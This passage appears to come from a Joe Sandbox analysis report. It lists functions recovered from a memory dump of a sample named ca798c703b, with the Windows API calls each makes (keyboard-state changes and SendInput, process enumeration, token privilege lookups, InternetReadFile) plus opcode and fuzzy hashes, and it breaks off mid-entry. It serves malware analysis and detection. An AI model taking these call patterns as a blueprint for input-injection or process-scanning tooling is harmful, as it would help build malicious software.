CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00845783
GetLastError.KERNEL32(?,00000000), ref: 008457A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008457CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008457FA

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 46fd6d61122afa6e2c1d0af601e992331469d6c6434bce9003a30c8040e62a9a
Instruction ID: bd3dd247817aee64446702457546250015bbb6c31945ddc4421018f279d18574
Opcode Fuzzy Hash: 46fd6d61122afa6e2c1d0af601e992331469d6c6434bce9003a30c8040e62a9a
Instruction Fuzzy Hash: 7E41F439600615DFCB15EF15C548A5EBBF2EF89720B198499EC4AAB362DB34ED00CB91

Function 0080D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,007F6D71,00000000,00000000,007F82D9,?,007F82D9,?,00000001,007F6D71,8BE85006,00000001,007F82D9,007F82D9), ref: 0080D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0080D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0080D9AB
__freea.LIBCMT ref: 0080D9B4

Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 63dc76da0ef2f65c5222892e8aa669718ff9f32375747eb1773565015e38d68a
Instruction ID: f4923856bf0d8e1d67ce15505fb96eebdce8a53473e4eebe546a93a2b7ccc2a4
Opcode Fuzzy Hash: 63dc76da0ef2f65c5222892e8aa669718ff9f32375747eb1773565015e38d68a
Instruction Fuzzy Hash: D631AD72A0020AABDF24DFA5DC45EBE7BA5FB41310B054168FC04DA291EB35DD51CBA0

Function 008652C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00865352
GetWindowLongW.USER32(?,000000F0), ref: 00865375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00865382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008653A8

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 91c12d4f76fd58f206adf29dbb27609bc5980673ef54e8405fe6ee899808010a
Instruction ID: 0d10227da7d1e6b8dd7c67bbd86ad97aabb0c7928817d19b84984f3236ed3cb5
Opcode Fuzzy Hash: 91c12d4f76fd58f206adf29dbb27609bc5980673ef54e8405fe6ee899808010a
Instruction Fuzzy Hash: 8B31D034A55A0CEFEF309E14CE1ABE97761FB06B90F5A4102FA11DA3E0C7B099409B42

Function 0083AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0083ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0083AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0083AC74
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0083ACC6

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2d6974bbe1a211c3f2aee5f6af1f02fca918b171b88f893cd9ea6ae390a62000
Instruction ID: 56fbe5f04fdd39d8a998f7e0c643f5cdcc32cad9ae0a11d8f25f45cb97dda318
Opcode Fuzzy Hash: 2d6974bbe1a211c3f2aee5f6af1f02fca918b171b88f893cd9ea6ae390a62000
Instruction Fuzzy Hash: 4E31E530A04618AFEB298B65C8087FA7AA5FBC5710F04621AE4C5D61D1C3758D8687D2

Function 00867674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0086769A
GetWindowRect.USER32(?,?), ref: 00867710
PtInRect.USER32(?,?,00868B89), ref: 00867720
MessageBeep.USER32(00000000), ref: 0086778C

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: de8a30ec417922fd22f89abc7f5c4d4cd2ef302ce14bdc63778e27131771bf5c
Instruction ID: d627f47bd7fb16bbe072d6e8ddf6f5555d8cf7ecb015cc586aa4f0c988c49c2b
Opcode Fuzzy Hash: de8a30ec417922fd22f89abc7f5c4d4cd2ef302ce14bdc63778e27131771bf5c
Instruction Fuzzy Hash: 1E418D34605254DFEB02CF58C898EA9BBF5FB49318F1A80A9E415DB261D730A941CFD0

Function 008616DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 008616EB

Part of subcall function 00833A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00833A57
Part of subcall function 00833A3D: GetCurrentThreadId.KERNEL32 ref: 00833A5E
Part of subcall function 00833A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008325B3), ref: 00833A65

GetCaretPos.USER32(?), ref: 008616FF
ClientToScreen.USER32(00000000,?), ref: 0086174C
GetForegroundWindow.USER32 ref: 00861752

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: a49b271572b6eb234638484914ccbb416f1247ea2a8b89955266b83f8b108118
Instruction ID: 2ec8603d83b1df80740cfe657f53067fc03a29d9d3203d2a2a3ef18babc24ca8
Opcode Fuzzy Hash: a49b271572b6eb234638484914ccbb416f1247ea2a8b89955266b83f8b108118
Instruction Fuzzy Hash: C0316371D00149AFCB00DFA9C885DAEBBF9FF48304B55806AE415E7312D7359E45CBA0

Function 0083D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0083D501
Process32FirstW.KERNEL32(00000000,?), ref: 0083D50F
Process32NextW.KERNEL32(00000000,?), ref: 0083D52F
CloseHandle.KERNEL32(00000000), ref: 0083D5DC

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: dc8d2865029d9e18043599c98cb63178b1e4560335f6fc674b117db087bac796
Instruction ID: 42c8047c474ea4ac8fa92c98de953b2b5897f1e2c4031f2fa0e277bbfcb3c7d2
Opcode Fuzzy Hash: dc8d2865029d9e18043599c98cb63178b1e4560335f6fc674b117db087bac796
Instruction Fuzzy Hash: D0317E711083009FD301EF54D885AAFBBF8FFD9354F14092DF585862A1EB71A949CB92

Function 00868FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2

GetCursorPos.USER32(?), ref: 00869001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00827711,?,?,?,?,?), ref: 00869016
GetCursorPos.USER32(?), ref: 0086905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00827711,?,?,?), ref: 00869094

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 04f2b570f5b71bdcee56aea8950291dde7067aa391d2a9f37b3872cf7a2d0dd4
Instruction ID: 3fda22aaf325c77736aa30eec50c85f4a914a10110b8a23d757c29bceae38e63
Opcode Fuzzy Hash: 04f2b570f5b71bdcee56aea8950291dde7067aa391d2a9f37b3872cf7a2d0dd4
Instruction Fuzzy Hash: 3921BF35601418EFDF258F94CC58EFA7BF9FB8A350F064069F9458B2A1C3719950DB61

Function 0083D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0086CB68), ref: 0083D2FB
GetLastError.KERNEL32 ref: 0083D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0083D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0086CB68), ref: 0083D376

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 74c9e1bf7237345976105c61de5bc759f42821414128a40fed3588a2835d57b5
Instruction ID: c8cb8937367ae0015c6d0b5cffe73f8b1320d380c80293dd7f696eff8e37c3b6
Opcode Fuzzy Hash: 74c9e1bf7237345976105c61de5bc759f42821414128a40fed3588a2835d57b5
Instruction Fuzzy Hash: 50218D70509301DF8300DF28E88586AB7E4FE96724F104A1EF4A9C33A1E7319D4ACB93

Function 00831571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00831014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0083102A
Part of subcall function 00831014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00831036
Part of subcall function 00831014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831045
Part of subcall function 00831014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0083104C
Part of subcall function 00831014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008315BE
_memcmp.LIBVCRUNTIME ref: 008315E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00831617
HeapFree.KERNEL32(00000000), ref: 0083161E

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 18722d70ecb86f79172cd51d798ab36d54a3e9a3bf4f6f159ed8961502b5ae00
Instruction ID: 500c555d0413e97c6fb1dbb95d9825e43cbe7945e217a975a5b2a84b2eb6430f
Opcode Fuzzy Hash: 18722d70ecb86f79172cd51d798ab36d54a3e9a3bf4f6f159ed8961502b5ae00
Instruction Fuzzy Hash: CA215731E00109EBDF00DFA5C949BEEB7B8FF94744F094869E441EB241E770AA05CBA0

Function 00862782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0086280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00862824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00862832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00862840

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ce9628a101f3c284fe01f9944a7e8fc7d5954cc66a76b4faffdeae21f6cf9639
Instruction ID: 6f963bbc827a1027e8d8337d1c231f1b541030132b8737fa5aa2e0780d556b95
Opcode Fuzzy Hash: ce9628a101f3c284fe01f9944a7e8fc7d5954cc66a76b4faffdeae21f6cf9639
Instruction Fuzzy Hash: EA21E031204911AFD7149B24CC45FAA7BA5FF45324F168299F426CB6E2CBB5EC42C790

Function 0084CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0084CE89
GetLastError.KERNEL32(?,00000000), ref: 0084CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0084CEFE

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 09613549167c877435786894739655993964d7a84896adeffc839c135edca722
Instruction ID: d13f615fe9dd71af066f9f936798a4cb40ead43079b49d0ec08ed99b0437674c
Opcode Fuzzy Hash: 09613549167c877435786894739655993964d7a84896adeffc839c135edca722
Instruction Fuzzy Hash: EB219DB1501309DBDB60DFA5C948BA67BFCFB50358F10442EE646D2251EBB8EE088B64

Function 008378F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00838D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0083790A,?,000000FF,?,00838754,00000000,?,0000001C,?,?), ref: 00838D8C
Part of subcall function 00838D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00838DB2
Part of subcall function 00838D7D: lstrcmpiW.KERNEL32(00000000,?,0083790A,?,000000FF,?,00838754,00000000,?,0000001C,?,?), ref: 00838DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00838754,00000000,?,0000001C,?,?,00000000), ref: 00837923
lstrcpyW.KERNEL32(00000000,?), ref: 00837949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00838754,00000000,?,0000001C,?,?,00000000), ref: 00837984

Strings

cdecl, xrefs: 0083797B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: d5999460fef50298be700ef7d8e9c9af12cad0eaff92f6bcaa746128e527bad1
Instruction ID: 904d0f6c5be7bc20c10f69e1a6c2ec6c99187e6d10f2d235c93159a056683447
Opcode Fuzzy Hash: d5999460fef50298be700ef7d8e9c9af12cad0eaff92f6bcaa746128e527bad1
Instruction Fuzzy Hash: 7611067A200341ABCB256F39C845E7A7BA9FF85350F00412AFC42C7364EB75D811C791

Function 00867CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00867D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00867D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00867D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0084B7AD,00000000), ref: 00867D6B

Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: ee37d9c051bb1950c38fc820b9f1b404dc2c2a53f87970de817d213a0214f710
Instruction ID: 470c6bfa446b80eab9ff46b18665d8274e4a355669607136f5696c16eff0adff
Opcode Fuzzy Hash: ee37d9c051bb1950c38fc820b9f1b404dc2c2a53f87970de817d213a0214f710
Instruction Fuzzy Hash: 8B11A231605615AFDB109F28DC08A7A3BA5FF46364F164B24F935C72F0E7309950CB90

Function 00865660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 008656BB
_wcslen.LIBCMT ref: 008656CD
_wcslen.LIBCMT ref: 008656D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00865816

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 2be3267690836d38ac7358de32b009c356103eda06c62e091d5b0069ae8e8047
Instruction ID: 96402e0715a300ce1ed6eaef6a2282d1329ffc86f7cd1d79b2f1141841309a03
Opcode Fuzzy Hash: 2be3267690836d38ac7358de32b009c356103eda06c62e091d5b0069ae8e8047
Instruction Fuzzy Hash: A3112671600608E6DF20DF61CC85AFE37ACFF11768F11406AFA15E6181EBB4CA80CB64

Function 00801D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1dfb51417606f1604995fc5e66328391196c8e259ae9cb2fcb153af36a51186
Instruction ID: d22cd7bb11ffd51e194d6adf3ef0d97c6c4e4e7620dafa03e2cd6d2684bae237
Opcode Fuzzy Hash: d1dfb51417606f1604995fc5e66328391196c8e259ae9cb2fcb153af36a51186
Instruction Fuzzy Hash: E30162B230561A7EFA9126B86CC9F67661DFF427B8F351325F921E11D2EB608C005161

Function 00831A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00831A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00831A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00831A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00831A8A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 30ea592a5ee0f8d6ab4377f754107a586f9d068c29c240425699f1b1664aa28e
Instruction ID: 9e9d33f2ee72939b6b21435bb58b11e84ba463635d8f54a7b20c14a843af33c2
Opcode Fuzzy Hash: 30ea592a5ee0f8d6ab4377f754107a586f9d068c29c240425699f1b1664aa28e
Instruction Fuzzy Hash: 5A11F73A901229FFEF119BA5C985FADBB78FB48750F200095EA04B7290D7716E50DB94

Function 0083E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0083E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0083E230
